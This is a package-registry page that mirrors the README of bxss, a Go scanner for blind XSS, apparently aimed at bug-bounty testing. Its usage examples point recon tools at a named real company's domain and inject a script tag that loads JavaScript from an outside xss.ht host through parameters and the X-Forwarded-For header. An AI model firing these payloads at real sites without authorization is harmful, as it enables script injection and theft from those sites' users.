New Case Study:See how Anthropic automated 95% of dependency reviews with Socket.Learn More
Socket
Sign inDemoInstall
Socket

github.com/ethicalhackingplayground/bxss

Package Overview
Dependencies
Alerts
File Explorer
Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

github.com/ethicalhackingplayground/bxss

  • v0.0.2
  • Source
  • Go
  • Socket score

Version published
Created
Source


Bxss

Bxss - Blind XSS Scanner

Version License Go Report Card Go Reference

Description

Blind XSS Scanner is a tool that can be used to scan for blind XSS vulnerabilities in web applications.


Features

  • Inject Blind XSS payloads into custom headers
  • Inject Blind XSS payloads into parameters
  • Uses Different Request Methods (PUT,POST,GET,OPTIONS) all at once
  • Tool Chaining
  • Really fast
  • Easy to setup

Install

go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest

Arguments

ArgumentDescriptionDefault
-appendModeAppend the payload to the parameter
-concurrency intSet the concurrency30
-header stringSet the custom header"User-Agent"
-headerFile stringPath to file containing headers to test
-parametersTest the parameters for blind xss
-payload stringThe blind XSS payload
-payloadFile stringPath to file containing payloads to test

Demonstration

asciicast


Blind XSS In Parameters

subfinder uber.com | gau | grep "&" | bxss -appendMode -payload '"><script src=https://hacker.xss.ht></script>' -parameters

Blind XSS In X-Forwarded-For Header

subfinder uber.com | gau | bxss -payload '"><script src=https://z0id.xss.ht></script>' -header "X-Forwarded-For"

If you get a bounty please support by buying me a coffee


Buy Me A Coffee

FAQs

Package last updated on 01 Dec 2024

Did you know?

Socket

Socket for GitHub automatically highlights issues in each pull request and monitors the health of all your open source dependencies. Discover the contents of your packages and block harmful activity before you install or update your dependencies.

Install

Related posts

SocketSocket SOC 2 Logo

Product

  • Package Alerts
  • Integrations
  • Docs
  • Pricing
  • FAQ
  • Roadmap
  • Changelog

Packages

npm

Stay in touch

Get open source security insights delivered straight into your inbox.


  • Terms
  • Privacy
  • Security

Made with ⚡️ by Socket Inc